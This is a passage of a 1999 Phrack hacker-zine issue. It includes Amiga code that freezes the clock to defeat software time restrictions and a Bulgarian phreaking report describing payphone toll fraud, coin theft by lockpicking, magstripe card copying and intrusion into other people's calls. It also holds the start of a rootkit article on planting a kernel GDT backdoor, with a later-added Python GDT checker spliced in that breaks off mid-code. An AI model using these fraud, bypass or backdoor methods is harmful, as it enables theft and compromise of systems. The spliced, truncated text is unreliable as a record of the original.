Configuration       : Multiples of 4, 12 and 24 line telephone interfaces
Management          : SecurPBX Administrator includes extensive
                      administrative menus in user-friendly Windows 3.1 and
                      95 environment, real time monitoring and management of
                      multiple PBX sites
Conclusion:
----------
SecurPBX is definitely the way to go to prevent your data and PBX systems
from getting hacked and abused.
0x02>------------------------------------------------------------------------
<++> P55/Linenoise/ckludge.c !2231f4cc
/* */
/* CKludge.C (Amiga) */
/* */
/* If you are a PC user you can port this C source easily. */
/* */
/* You might even want to use it to fix your fucking millenium bug... */
/* */
/* Ha! Ha! Ha! 2000 is nigh. */
/* */
/* Clock Kludge 1.0 by `The Warlock' */
/* */
/* This little patch will freeze your clock - useful if you wish to bypass */
/* time restrictions imposed by many programs... */
/* */
/* It works by patching the level 3 IRQ vector, vertical blank, to hold the */
/* complex interface adapter internal time of day clock registers to zero. */
/* ($bfe801 = TOD lo, $bfe901 = TOD mid, $bfea01 = TOD hi) */
/* */
/* Should work on all Amiga models. */
/* */
/* Handles relocated vector base correctly. */
/* */
/* Compiling info: lc2 -v (disable stack checking so no need to use le.lib) */
/* */
#include "exec/types.h"
#include "exec/memory.h"
#include "exec/interrupts.h"
#include "hardware/custom.h"
#include "hardware/intbits.h"
#include "proto/exec.h"      /* prototypes for AllocMem/AddIntServer/...     */
#include <stdio.h>
#include <stdlib.h>
struct Interrupt *VertBIntr;
long count;                  /* bumped once per vertical blank by the server */
int main(void)
{
    extern void VertBServer();   /* assembled separately, see below */
    /* allocate an Interrupt node structure */
    VertBIntr=(struct Interrupt *)
        AllocMem (sizeof(struct Interrupt),MEMF_PUBLIC);
    if (VertBIntr==0){
        printf("not enough memory for interrupt server");
        exit (100);
    }
    /* initialize the Interrupt node */
    VertBIntr->is_Node.ln_Type=NT_INTERRUPT;
    VertBIntr->is_Node.ln_Pri=-60;
    VertBIntr->is_Node.ln_Name="Clock Kludge";
    VertBIntr->is_Data=(APTR)&count;
    VertBIntr->is_Code=VertBServer;
    /* put the new interrupt server into action */
    AddIntServer (INTB_VERTB,VertBIntr);
    /* wait for user to type 'q' */
    printf ("Type q to quit...\n");
    while (getchar()!='q');
    /* remove interrupt server */
    RemIntServer (INTB_VERTB,VertBIntr);
    /* free memory */
    FreeMem (VertBIntr,sizeof(struct Interrupt));
    return 0;
}
/* the VertBServer might look like this (68000 assembly, assembled and
   linked separately; exec passes is_Data to the server in a1): */
        XDEF    _VertBServer
_VertBServer:
        clr.b   $bfe801         ; clear TOD lo
        clr.b   $bfe901         ; clear TOD mid
        clr.b   $bfea01         ; clear TOD high
        move.l  a1,a0           ; get address of count
        addq.l  #1,(a0)         ; increment value of count
        moveq   #0,d0           ; continue to process other vb-servers
        rts                     ; must be rts NOT rte
        end                     ; eof
<-->
0x03>------------------------------------------------------------------------
<++> P55/Linenoise/IPChange.asm !85660240
*--------------------------------------*
* IPChange.Asm (DevPac) by `The Warlock'
* Nowadays almost all ISPs allocate dynamic IP addresses, meaning your IP
* address will change for each connection you make.
* On a shitbox PC, a reset causes the CD signal on the serial port to go low,
* meaning that the connection is lost and you must initiate another.
* On an Amiga, a reset does not pull the CD signal low, meaning that
* reconnection is possible.
* When you reconnect, your ISP allocates another dynamic IP address, so in
* effect, you have changed your IP address without starting a new connection!
* Create a batch file called ipchange.bat as follows:
*     echo > s:reconnect
*     wait 5
*     cpu nofastrom > nil:
*     ipchange
* Make the following additions to your startup-sequence:
*     if exists s:reconnect
*         delete s:reconnect > nil:
*         execute <your internet startup script>
*     else
*     endif
* Now, whenever called, ipchange.bat will reset, and automatically load your
* internet software for quick reconnection.
*--------------------------------------*
        opt     c+,d-           case sensitive no debug
        section ,code           code section
*--------------------------------------*
START   bra.s   MAIN            call main
*--------------------------------------*
ID      dc.b    "$VER:IPChange V1.0 by `The Warlock!",0
*--------------------------------------*
        cnop    0,4             32 bit alignment
MAIN    move.l  4.w,a6          exec base a6
        jsr     -$84(a6)        call forbid()
        move.l  4.w,a6          exec base a6
        jsr     -$78(a6)        call disable()
        lea     RESET(pc),a5    supervisor code a5
        move.l  4.w,a6          exec base a6
        jsr     -$1e(a6)        call supervisor()
*--------------------------------------*
        cnop    0,4             32 bit alignment
RESET   lea     2,a0            kickstart rom jump vector
        reset                   kickstart rom remapped
        jmp     (a0)            kickstart rom restarted
*--------------------------------------*
        end                     eof
*--------------------------------------*
<-->
0x04>------------------------------------------------------------------------
THE BULGARIAN PHREAK SCENE
^^^^^^^^^^^^^^^^^^^^^^^^^^
by TOKATA (firestarter)...
What to say about the Bulgarian phreak scene - is there really one?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hmmm... it's bad news - in Bulgaria there aren't any phreak-wise people at
all... But almost every second fucked bastard who has a computer is interested
in hacking. Bastards who don't know any programming language; their hard
drive is full of games, MP3s and porno JPG files; they hang on the Internet
and download hacking programs. They use them (or ask someone to show them how
to work with them) and imagine they are superhackers. So Bulgaria is full of
motherfucking lamers.
We have an electronic underground magazine named "Phreedom Magazine", but
hacking is the main theme. No phreak articles, because there aren't any
phreak authors. So, read...
Bulgarian phone system - the best phone system in the world! :)))
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hmmm... how to begin... err... So, 98% of our local tandem exchanges are
SxS A-29 type (made by Siemens). A typical SxS exchange - no computerization,
Strowger switches, sleeve. The impedance is 600 Ohms, the battery voltage
off-hook is 60V, on-hook 10V. The resistance range is 0-1600 Ohms, the
current 15-100mA, but usually 40-60mA.
A mini Bulgarian crossbar system (KRS-200) is used in some small villages
(up to 200 subscribers). As the national transit exchange, "Crosspoint"
(made by Siemens too), aka ESK-1000, is used. The Crosspoint switch is an
ESK relay. ESK stands for Edelmetall-Schnell-Kontakt in German. "Crosspoint"
is also used as a local tandem in some of the big cities.
In Sofia (our capital) there is an international transit exchange, MT-20
(by THOMSON - France). Also a year ago our Telco began to install real digital
switching systems there. But the tax for these is terrible and their
subscribers are companies, offices and some bastards with a lot of money...
and most of the capital's ISPs ;)
The cables are quite old, there is a lot of background noise in the handset,
the modem connections are terrible - with a 14.4K modem the average speed is
1000bps, and it drops you every 3 minutes. After rain there is no subscriber
with a normal connection.
So number detection here is very hard. By us ONLY the calling party can
drop the connection. So if you want to catch someone, you make a complaint to
the telco. They put on your linefinder a device named 'dog'. That 'dog'
acts on the switch contacts, so you can hold the connection. After that,
you call the Telco from the neighbors and they trace the called party number
by the wires. But the 'dog' doesn't work on long distance conversations. Also
we have ANI equipment, named 'AMUR' or 'SKAT', specially designed for SxS
switches, but in the villages and very small towns there isn't any ANI. So
with ANI the Telco can catch you, but they don't use it for normal cases, I
think you know 'why' ;))) But if you make a call from a different area the
Telco can't catch you even with the help of ANI :) But nobody knows that :(
All the people think: "The Telco CAN ALWAYS DETECT your number! There is no
chance to mislead them". Blah, what idiots. Btw I'm trying to test forced
ANIF here, so I hope to get it working. In my town (47 000 citizens) we have
ANI equipment, but all the Telco employees say it's used only for subscriber
info. The billing information here is still collected with the help of
photographs. No operator comes on my line when I flash the switchhook.
Signaling
~~~~~~~~~~
I devoted 2 years to learning the signaling methods in Bulgaria, but:
1. There aren't good tech books about signaling. In some books it is
mentioned quite cursorily. 70% or more of what I know about signaling I have
learned from several Phrack articles.
2. Nobody from the local Telco in my town knows anything about this. I talked
with a few highly educated employees, but they knew less than me :(
Well, I have learned the following from the books (and from other places):
N4 and N5 are used on international circuits, otherwise R2 is used. Well, I
know that "Crosspoint" uses R2, but I'm not sure that the stupid A-29 (SxS
type) uses the R2 signaling system. Also, I have read in a tech book that
(!) R2 is an in-band signaling system. But we all know that this is not true,
because the blow-off frequency for R2 is 3825Hz.
The major multiplexing is FDM with 4KHz channels. So if you whistle a 3825Hz
tone into the microphone when speaking on LD, the other end will hear that.
So we try to blue box with programs. If that succeeds, we will announce it :)
But I think there are line and rejector filters at the end of our trunks
and the signal must be clean (a straight sinusoid). A telco employee told
me he heard about a 2100Hz signal, but he wasn't sure :( Can anyone help?
Our beloved Telco
~~~~~~~~~~~~~~~~~
So by us, the BTC (Bulgarian Telecommunication Company) was always
monopolistic. Also they are now trying to occupy and take under full control
all ISPs in Bulgaria. Local calls are not free and our taxes are the highest
in Europe. Our average salary is 100$ and we pay 0.04$ for each tax unit.
There are also permanent taxes and other things, and for comparison, if you
have 200 units you'll pay 10$. That's 12% of the average salary in the
country!!! Also if you dial from Canada to Bulgaria that'll cost you 0.8$ per
minute, BUT IF YOU CALL Canada from Bulgaria (btw we can't dial North America
direct without operator assistance) that'll cost you 2.3$ per minute
he-he-he :)
So this year our Telco is going private. There were 3 candidates to
buy 51% of the Telco's shares - a Deutsche Telekom/Turkish firm, Telefonica
and the Dutch/Greek telcos. The price was 500 000 000$. But Telefonica and DT
gave up at the last moment. Maybe you can guess why? Nobody wants to throw
his money at a Telco that uses 98% SxS switches, where a big part of the
people (70%) are poor and don't make many calls (under 100 units), in a
country where you don't know what will happen tomorrow, etc...
So, as I've read about Argentina's telco, I can say the situation is
almost the same. But by us there is ONLY ONE company which controls
everything - all the phones, pagers, a big part of the GSM network, all public
phones, runs the only X.25 datapac network - BULPAC, they are also an ISP...
Total monopoly!
The Laws
~~~~~~~~
Ha-ha-ha? What laws? Against phreaking? No way :) Also nobody
in Bulgaria understands what {the fuck} the term 'phreaking' means. And not
just the ordinary people. If you are in the IRC channel #bulgaria and ask:
"Hey, what does phreaking mean?", I'm sure that nobody will know.
Up to now, I haven't heard about anyone getting busted for phreaking. Our
telco (and all of their employees) think the system is unbreakable! But they
also have a law about devices that are illegally hooked to the phone line.
The first time you'll be warned 'bout that, and the second time you'll be
disconnected. But you pay the tax for a new phone (100$) and congratulations
- you have a phone again :)
So, our legislation doesn't contain anything about hacking, cracking,
phreaking and all kinds of electronic fraud. In Bulgaria there is no term
such as 'illegal software' or 'illegal access to someone's computer'.
The PayphoneZ
~~~~~~~~~~~~~
There is no good word to say about our shitty motherfucking Telco, even for
payphones. You think you can do red boxing in Bulgaria? Forget it! Our
payphones are COCOTs and are used only for local calls! They are huge metal
boxes :) fully mechanical, no fine electronics! You can see inside a capacitor
like a hand bomb! The payphones worked with coins, but there were so many
idiots who took their coins out of the payphones with a thread (string). So
our beloved Telco became mad about this and they replaced the coins with
special phone-coins made by them, with borders which made them impossible to
take out ;). As I have said, the payphones are COCOTs - you take the handset,
hear a dialtone, dial a number (pulse, with a dialing disk!!!), the called
person answers... and then the polarity is reversed. A relay inside the phone
notices that and after 3 seconds cuts off the mouthpiece... and the earpiece.
Then the hole for the money gets opened and the coin falls inside. There is
no such thing as coin return.
There is a trick to make free (local) calls on these phones. If you press
the hook when the polarity is reversed, there is no current on the line at
that moment, and because there is no current at that moment, the relay
won't notice the answer, and it won't cut the mouthpiece and earpiece.
Another trick is to unlock the phone and fill your pockets with coins :)
The lock picking on these is quite easy...
There were also payphones for international and LD calls operating with
money, but 10 years ago a big inflation began and these phones died.
Now you would have to put in a lot of coins (2-5kg) to make a 3 min
international call.
So 5-6 years ago our telco installed two types of card-phones: BetCom and
Bulfon. BetCom is a British-Bulgarian company (GPT&BTC) and their card phones
are magnetic strip style. The security of these cards was too weak so a few
people began to make free phone calls. After 3 years of losing a lot of money
from these frauds, BetCom installed new phones and changed the cards to
electronic ones, but there are still many old phones :) You just copy the
magnetic strip of the card and there it is...
The Bulfon phones are much more intelligent. They are the same as those in
Argentina and Germany. The test signal is 16KHz, they have a nice LCD display,
buttons for several languages, for replacing exhausted cards, for signal
amplification and other options. I forgot to say that both cardphones use
pulse dialing. They usually don't have a number to dial the cardphone, but for
a short time the phones in the capital have already had a number... and MF
dialing.
There was a very popular trick on Bulfon cardphones with 2 cards - a full one
and an empty one (but with at least 1 unit). You quickly push and pull the
full card into the slot and the display begins to flash. After that you do
this again and put in the empty card. The phone remembers the units from the
first card and you talk for free. A big number of people became familiar with
this and they began to use it with and without need. And since our telco is
mad about every lost penny, this feature bombed out. Also I have heard that a
few people recharge cards and make unlimited ones (a PIC emulator), but since
I'm not a cardphreaker, I don't know much about it. But I know that the
Bulfon exchange is very sophisticated and it's very hard to fool it. For
example, you can't dial more than 400 units with the same card from one
cardphone. And yet one more funny feature - every night, a built-in modem in
the cardphone establishes a connection with the Bulfon exchange and transfers
info. Info such as how many units are used, the cards' serial numbers and
much more (such as frauds).
If you, for example, steal a few cards from the post office, the exchange
sends to all the phones that cards with number 444 xxx xxx ... are invalid.
Ahh... I forgot, the public phone cables don't go through PVC or metal
pipes. But... on Bulfon (and I think also on BetCom) phones you can't just
cut the wire and hook up a handset, because as you know the line device can't
find the phone - when you pick up the handset on Bulfon, the exchange sends a
16KHz test signal and the phone must answer with the same signal. The CPU of
these is a 68HC11 (Motorola).
Btw we have had a GSM network since 1995. Also we have a pager network.
Phreaking methods
~~~~~~~~~~~~~~~~~
As I have said, there aren't phreak-wise people in Bulgaria (but almost
everyone is interested in hacking). A lot of falsely accused 'phreaks' do
pitting - hooking a handset to a pair of wires or the outside connection box.
Phreak methods used by me are:
- forced 3way calling = some type of abuse of the structure of the connector.
So, in my town the NPA is X-YY-ZZ. So let's imagine that someone called
4-33-28. I begin to dial 4-33 and when I hit the right pause after the 3rd,
it puts me into their conversation.
- free calling from local payphones = already talked 'bout that.
- free calling on local and short haul calls - by dialing a chain of
prefixes (such as in the UK). I dial the prefix (NPA) of the town X, and after
that dial the prefix for another place and then the number. But not every
exchange allows you to do that. Your exchange waits for a signal from
exchange X that the called party has answered, but X waits for that too...
But the connection is terrible... and after 3 minutes without taxing on the
trunk your Telco cuts the connection ;(
Also I think that black and blue boxing are still possible, but I didn't test
it entirely.
There are also "hidden" long distance numbers and prefixes, which are very
useful in some cases (I also found 3-4 of them), but nobody tries to find
them :(
There aren't free numbers in Bulgaria, except those for police, fire alarm,
hospital and the telco number for failure complaints, but they are ONLY FOR
LOCAL DIALING! I also discovered a method to call these as trunk-calls, BUT...
but our phone system is made so that if on a trunk-call there isn't a tax
signal coming after 3 minutes, the call is terminated.
Some people with knowledge of electronics also make "free calls" through
their neighbors' lines, but BTC is familiar with those methods and it always
checks the line (plus those of the neighbors) when a subscriber makes a
complaint about a big bill.
In Bulgaria there are NO PBXes, Voice Mail Systems, WATS numbers, Call
forwarding, Call waiting, DTMF requesting, Speed dialing and others.
About PBXes - some of our factories have PBXes, but I'm still learning how to
use/abuse them.
In almost every town with more than 10 000 subscribers we have a conference
phone, which can be dialed only locally (errrr... not quite true ;)) for 1
tax unit per 3/5/10/30 minutes. But the stupid people don't know that and
in many towns (such as mine) this phone is *forever* free.
I also have heard about people who emulate the GSM SIM card to make free
calls.
PHREAK'EM ALL!!!
0x05>------------------------------------------------------------------------
----[ PDM
Phrack Doughnut Movie (PDM) last issue was `Dark City`.
PDM54 recipients:
I forget. I think Adam Shostack was definitely one. It's been a while
though.
PDM55 Challenge:
"Beware my wrath."
0x06>------------------------------------------------------------------------
----[ Super Elite People That REad Phrack (SEPTREP)
New additions:
Why they are SEP:
----[ Current List
W. Richard Stevens
Ron Rivest
-----------------------------------------------------------------------------
----[ EOF
-------[ Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 04 of 19 ]
-------------------------[ P H R A C K 5 5 P R O P H I L E ]
This issue we're doing something a bit differently. Normally, this file is
reserved for the Phrack Prophile. However, this issue, we are instead paying
homage to a recently deceased esteemed member of the upper echelon of the
computer elite. This is our little way of providing a tribute to the most
widely read TCP/IP author in history.
I first read Stevens in 1992. I still have that first edition UNIX Network
Programming book sitting on my shelf. I learned a great deal from that book,
but that was nothing compared to how much the TCP/IP Illustrated series taught
me... I remember getting vol. I in 1994.. I still have that one too, all
marked up with highlighters and whatnot... Before I knew it, I found myself
firmly immersed in IP networks (I even read vol. II from cover to cover).
I know I have Stevens to thank for sparking that interest in me. His death
is a great loss.
There is also another reason why W. Richard Stevens is featured here -- he was
to be the prophile for Phrack 55.
I sent Richard email initially on August 31st asking him if he would have
time to be profiled for Phrack 55. To my great delight (and somewhat surprise)
he agreed! I emailed him the template, and sent him a follow-up email...
The last I heard from him was on September 1st, telling me that he was
pretty busy and needed some time to look it over. Sadly this is also the
day he died. These emails will not appear here out of respect for Stevens
and his family. Instead, republished here is a copy of his obituary from
www.bigdealclassifieds.com.
STEVENS, W. Richard, noted author of computer books died on September 1.
He is best known for his ``UNIX Network Programming'' series (1990, 1998,
1999), ``Advanced Programming in the UNIX Environment'' (1992), and ``TCP/IP
Illustrated'' series (1994, 1995, 1996). Richard was born in 1951 in Luanshya,
Northern Rhodesia (now Zambia), where his father worked for the copper
industry. The family moved to Salt Lake City, Hurley, New Mexico, Washington,
DC and Phalaborwa, South Africa. Richard attended Fishburne Military School in
Waynesboro, Virginia. He received a B.SC. in Aerospace Engineering from the
University of Michigan in 1973, and an M.S. (1978) and Ph.D. (1982) in Systems
Engineering from the University of Arizona. He moved to Tucson in 1975 and
from then until 1982 he was employed at Kitt Peak National Observatory as a
computer programmer. From 1982 until 1990 he was Vice President of Computing
Services at Health Systems International in New Haven, CT, moving back to
Tucson in 1990. Here he pursued his career as an author and consultant. He
was also an avid pilot and a part-time flight instructor during the 1970's.
He is survived by his loving wife of 20 years, Sally Hodges Stevens; three
wonderful children, Bill, Ellen and David; sister, Claire Stevens of Las Vegas,
NV; brother, Bob and wife Linda Stevens of Dallas, TX; nieces, Laura, Sarah,
Collette, Christy; and nephew, Brad. He is predeceased by his parents, Royale
J. Stevens (1915-1984); and Helen Patterson Stevens (1916-1997). Helen lived
in Tucson from 1991-1997, and Royale lived here in the early 1930's attending
Tucson High School while his father was treated for TB at the Desert
Sanitorium (now TMC). The family asks that in lieu of flowers, donations
be made in Richard's name to Habitat for Humanity, 2950 E. 22nd Street,
Tucson, AZ 85713.
-- route
----[ EOF
-------[ Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 05 of 19 ]
-------------------------[ A *REAL* NT Rootkit, patching the NT Kernel ]
--------[ Greg Hoglund <hoglund@ieway.com> ]
Introduction
------------
First of all, programs such as Back Orifice and Netbus are NOT rootkits. They
are amateur versions of PC-Anywhere, SMS, or a slew of other commercial
applications that do the same thing. If you want to remote control a
workstation, you could just as easily purchase the incredibly powerful SMS
system from Microsoft. A remote-desktop/administration application is NOT a
rootkit.
What is a rootkit? A rootkit is a set of programs which *PATCH* and *TROJAN*
existing execution paths within the system. This process violates the
*INTEGRITY* of the TRUSTED COMPUTING BASE (TCB). In other words, a rootkit is
something which inserts backdoors into existing programs, and patches or breaks
the existing security system.
- A rootkit may disable auditing when a certain user is logged on.
- A rootkit could allow anyone to log in if a certain "backdoor" password is
used.
- A rootkit could patch the kernel itself, allowing anyone to run privileged
code if they use a special filename.
The possibilities are endless, but the point is that the "rootkit" involves
itself in pre-existing architecture, so that it goes un-noticed. A remote
administration application such as PC Anywhere is exactly that, an application.
A rootkit, on the other hand, patches the already existing paths within the
target operating system.
To illustrate this, I have included in this document a 4-byte patch to the NT
kernel that removes ALL security restrictions from objects within the NT
domain. If this patch were applied to a running PDC, the entire domain's
integrity would be violated. If this patch goes unnoticed for weeks or even
months, it would be next to impossible to determine the damage.
Network based security & the Windows NT Trust Domain
----------------------------------------------------
If you know much about the NT Kernel, you know that one of the executive
components is called the Security Reference Monitor (SRM). The DoD Red Book
also defines a "Security Reference Monitor". We are talking the same language.
In the Red Book, a security domain is managed by a single entity.
To Quote:
"A single trusted system is accredited as a single entity by a single
accrediting authority. A ``single trusted system'' network implements a
reference monitor to enforce the access of subjects to objects in accordance
with an explicit and well defined network security policy [DoD Red Book]."
In NT parlance, that is called the Primary Domain Controller (PDC). Remember
that every system has local security and domain security. In this case, we are
talking about the domain security. The PDC's "Security Reference Monitor" is
responsible for managing all of the objects within the domain. In doing this,
it creates a single point of control, and therefore a "single trusted system"
network.
How to violate system integrity
-------------------------------
I know this is a lot of book theory, but bear with me just a bit longer. The
DoD Orange Book also defines a "Trusted Computing Base" (TCB). If you are an
NT programmer, then you have likely worked with the security privilege
SE_TCB_PRIVILEGE. That privilege maps to the more familiar "act as part of the
Operating System" User-Right. Using the User Administrator for NT you can
actually add this privilege to a user.
If you have the ability to act as part of the TCB, you can basically do
anything. There is very little security implemented between your process and
the rest of the machine. If the TCB can no longer be trusted, then the
integrity of the entire network system is shot. The patch I am about to show
you is an example of this. The patch, if installed on a Workstation, violates
a network "partition". The patch, if installed on a PDC, violates the entire
network's integrity.
What is a partition?
The Red Book breaks the network into NTCB (Network Trusted Computing Base)
"Partitions". Any single component or machine on the network may be considered
a "partition". This makes it convenient for analysis.
To Quote:
"An NTCB that is distributed over a number of network components is referred
to as partitioned, and that part of the NTCB residing in a given component is
referred to as an NTCB partition. A network host may possess a TCB that has
previously been evaluated as a stand-alone system. Such a TCB does not
necessarily coincide with the NTCB partition in the host, in the sense of
having the same security perimeter [DoD Red Book]."
On the same host you may have two unique regions, the TCB, which is the
traditional Orange Book evaluation for Trusted Computing Base, and the NTCB.
These partitions do not have to overlap, but they can. If any component of one
is violated, it is likely that the other is as well. In other words, if a host
is compromised, the NTCB may also be compromised.
Obviously to install a patch over the TCB, you must already be Administrator,
or have the ability to install a device driver. Given that Trojans and Virii
work so well, it would be very easy to cause this patch to be installed w/o
someone's knowledge.
Imagine an exploit
------------------
Before I digress into serious techno-garble, consider some of the attacks that
are possible by patching the NT kernel. All of these are possible because we
have violated the TCB itself:
1. Insert invalid data. Invalid data can be inserted into any network stream.
It can also introduce errors into the fixed storage system, perhaps subtly
over time, such that even the backups get corrupted. This violates
reliability & integrity.
2. Patch incoming ICMP. Using ICMP as a covert channel, the patch can read
ICMP packets coming into the kernel for embedded commands.
3. Patch incoming ethernet. It can act as a sniffer, but without all of the
driver components. If it has patched the ethernet, then it can also stream
data in/out of the network. It can sniff crypto keys.
4. Patch existing DLL's, such as wininet.dll, capturing important data.
5. Patch the IDS system. It can patch a program such as Tripwire or
RealSecure to violate its integrity, rendering the program unable to detect
the nastiness...
6. Patch the auditing system, i.e., event log, to ignore certain event log
messages.
Now for the rare steak. Let's delve into an actual kernel patch. If you
already understand protected mode and the global descriptor table, then you can
skip this next section. Otherwise put on your hiking boots, there are a couple
of switchbacks ahead.
Rings of Power
--------------
Windows NT is unlike DOS or Windows 95 in that it has process-space security.
Every user-mode process has an area of memory that is protected by a Security
Descriptor. Usually this SD is determined from the Access Token of the user
that started the process. Access to all objects is handled through an "Access
Control List". For Windows NT, this is called "Discretionary Access Control".
Personally I find it really hard to grasp something if I don't understand its
most basic details. So, this next section describes the very foundation that
makes security possible on the x86 architecture.
First, it is important to understand "protected mode". Protected mode can only
be understood by memory addressing. Almost all of the expanded capabilities of
the x86 processor are built upon memory addressing. Protected mode gives you
access to a 4 GB memory space. Multitasking and privilege levels are all
based upon tricks with memory addressing. This discussion only applies to 386
and beyond.
Memory is divided into code and data segments. In protected mode, all memory
is addressed as a segment + an offset. Conversely, in real mode, everything is
interpreted as an actual address. For our discussion, we only care about
protected mode. In protected mode things get a little more complicated. We
must address first the segment, followed by an offset into that segment. It
is sort of a two step process. Why is this interesting?? This is how most
modern operating systems work, and it is important for exploits and Virii. Any
modern mobile code must be able to work within this arena.
What is a selector?
A selector is just a fancy word for a memory segment. Memory segments are
organized by a table. These table entries are often called descriptors. So,
remember, a selector is-a segment is-a descriptor. It's all the same thing.
If you understand how the memory segments are kept track of, then you pretty
much understand the whole equation. Every memory segment is first a virtual
address (16-bits) plus an offset from that address (32-bits). A segment is not
an actual address, like in real mode, but the number of a selector it wants to
use. A selector is usually a small integer number. This small number is an
offset into a table of descriptors. In turn, the descriptor itself then has
the actual linear address of the beginning of the memory segment. In addition
to that, the descriptor has the access privilege of the memory segment.
Descriptors are stored in a table called the Global Descriptor Table (GDT).
Each descriptor has a Descriptor Privilege Level (DPL), indicating what ring
the memory segment runs in.
Suffice it to say, the selector is your vehicle. Under NT and 95, there
are selectors which cover the entire 4GB address range. If you were using
one of these selectors, you could walk all over the memory map from 0 to
whatever. These selectors do exist, and they are protected by a DPL of 0.
Under Windows 9x, selector 28 is a ring 0 that covers the entire 4gb region.
Under NT, selectors 8 and 10 achieve the same purpose.
Dumping the GDT from SoftIce produces a table similar to this:
GDTBase=80036000 Limit=0x03FF
0008 Code32 00000000 FFFFFFFF 0 P RE
0010 Data32 00000000 FFFFFFFF 0 P RW
001B Code32 00000000 FFFFFFFF 3 P RE
0023 Data32 00000000 FFFFFFFF 3 P RW
0028 TSS32 8001D000 000020AB 0 P B
0048 Reserved 00000000 00000000 0 NP
0060 Data16 00000400 0000FFFF 3 P RW
etc, etc ....
You can see what segment you are currently using by checking the CPU registers.
The registers SS, DS, and CS indicate which selectors are being used for Stack
Segment, Code Segment, and Data Segment. The stack and code segments must be
in the same ring.
1. Segments can overlap one another. In other words, more than one segment can
represent the same address-space. Segments can overlap one another wholly, or
only in part. The address range for a segment is important, of course, but
there is other delicious information we care about. For instance, a segment
also has a Privilege Level (DPL).
      ----    ----
      |  |    |  |
      |  |    |  |
      |  |    ----
      |  |    ----
      |  |    |  |
      |  |    |  |
      ----    |  |
              |  |
              ----
What is a DPL?
Descriptor Privilege Level. This is important to understand. Every memory
segment is protected by a privilege level, often called a "ring". The Intel
processor has 4 rings, 0 through 3, usually only ring 0 and 3 are used. Lower
ring levels have more privilege. In order to access a memory segment, the
caller must have a current privilege level equal to or lower than the one being
accessed. Current privilege level is often called CPL, and descriptor
privilege level is often called DPL.
This type of protection is a requirement for almost any security architecture.
In the old days of DOS, mobile code such as virii were able to hook interrupts
and execute any code at whim. They were walking all over the memory map at
will. No such luck with the advent of Windows NT. There's a gaping need for
Windows NT exploits that can take advantage of the old tricks. The central
problem is that most code is executing within user mode, and has no access to
ring 0, and therefore no access to the Interrupt Descriptor Table or the
memory map as a whole.
Under NT, the access to ring 0 is controlled from the right to add your own
selector to the GDT. When you transition to ring 0, you are still in protected
mode and the Virtual Memory Manager is still operating.
Lets suppose you have written a virus that patches the Global Descriptor Table
(GDT) and adds a new descriptor. This new descriptor describes a memory
segment that covers the entire range of the map, from 0 to FFFFFFFF___. The
DPL of the descriptor is 0, so any code running from it can access other ring-0
segments. In fact, it can access the entire map. A DPL 0 memory segment
marked as "conforming" will violate integrity. The sensitivity label, in this
regard, would be the DPL. The fact it is conforming violates the DPL's of
other segments, if they overlap.
If your descriptor is marked conforming, it can be called freely from ring-3
(user mode). This new entry goes unnoticed, of course. Who monitors the GDT
on their system? Most people don't even know what that is. There are few IDS
systems that monitor this type of information. Now you have effectively placed
a backdoor into the memory map. You could be running under any process token,
and have full read/write access to the map. This means reading/writing other
important tables, such as the Interrupt Table. This means reading other
procii's protected memory. This means infecting other files and procii w/ your
virii at whim.
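To make the GDT dump above concrete, and since the question "who monitors the GDT on their system?" deserves an answer, the following is an example I have added (it is not part of the original article). It decodes raw 8-byte descriptors into the selector/type/base/limit/DPL fields SoftIce prints and diffs a GDT image against a known-good snapshot, reporting added or changed entries and any conforming DPL-0 code segment. The descriptor bytes are constructed to mirror the dump in the text; the entry planted at 0048 is a hypothetical test vector.

```python
"""
Decode raw x86 GDT entries into the fields SoftIce prints (selector,
type, base, limit, DPL, P) and diff a GDT image against a known-good
baseline, reporting entries that were added or changed and any
conforming DPL-0 code segment.  Added example; the descriptor bytes
are constructed to mirror the dump in the text.
"""
import struct
from dataclasses import dataclass, astuple

@dataclass
class Descriptor:
    selector: int      # index << 3 (TI=0, RPL=0; the dump's 001B/0023 are RPL-3 views)
    kind: str
    base: int
    limit: int         # in bytes, after applying the G (granularity) bit
    dpl: int
    present: bool
    conforming: bool   # meaningful for code segments only

SYSTEM_TYPES = {0x2: "LDT", 0x9: "TSS32", 0xB: "TSS32", 0xC: "CallGate32"}

def decode_descriptor(raw: bytes, index: int) -> Descriptor:
    """Unpack one 8-byte descriptor sitting at slot `index` of the GDT."""
    if len(raw) != 8:
        raise ValueError("descriptor must be 8 bytes")
    lim_lo, base_lo, base_mid, access, flags, base_hi = struct.unpack("<HHBBBB", raw)
    base = base_lo | (base_mid << 16) | (base_hi << 24)
    limit = lim_lo | ((flags & 0x0F) << 16)
    if flags & 0x80:                       # G=1: limit counts 4K pages
        limit = (limit << 12) | 0xFFF
    present = bool(access & 0x80)
    dpl = (access >> 5) & 3
    typ = access & 0x0F
    if access == 0:
        kind, conforming = "Reserved", False
    elif not access & 0x10:                # S=0: system descriptor
        kind, conforming = SYSTEM_TYPES.get(typ, "System%X" % typ), False
    else:                                  # S=1: code or data segment
        code = bool(typ & 0x8)
        conforming = code and bool(typ & 0x4)
        kind = ("Code" if code else "Data") + ("32" if flags & 0x40 else "16")
    return Descriptor(index << 3, kind, base, limit, dpl, present, conforming)

def decode_gdt(image: bytes) -> list:
    """Decode every slot of a GDT image except the null descriptor at 0."""
    return [decode_descriptor(image[i * 8:(i + 1) * 8], i)
            for i in range(1, len(image) // 8)]

def render(d: Descriptor) -> str:
    """One line in the style of SoftIce's GDT command."""
    return "%04X %-9s %08X %08X %d %s" % (d.selector, d.kind, d.base,
                                         d.limit, d.dpl, "P" if d.present else "NP")

def find_unexpected(live: bytes, baseline: bytes) -> list:
    """Present descriptors in `live` that are missing from or differ from
    `baseline`, plus any conforming ring-0 code segment (the entry the
    text describes as a backdoor into the whole memory map)."""
    known = {d.selector: astuple(d) for d in decode_gdt(baseline) if d.present}
    return [d for d in decode_gdt(live) if d.present and
            (known.get(d.selector) != astuple(d) or (d.conforming and d.dpl == 0))]

# ---- constructed test data --------------------------------------------
def _slot(limit: int, base: int, access: int, flags_hi: int) -> bytes:
    """Pack the fields into the scrambled on-disk descriptor layout."""
    return struct.pack("<HHBBBB", limit & 0xFFFF, base & 0xFFFF,
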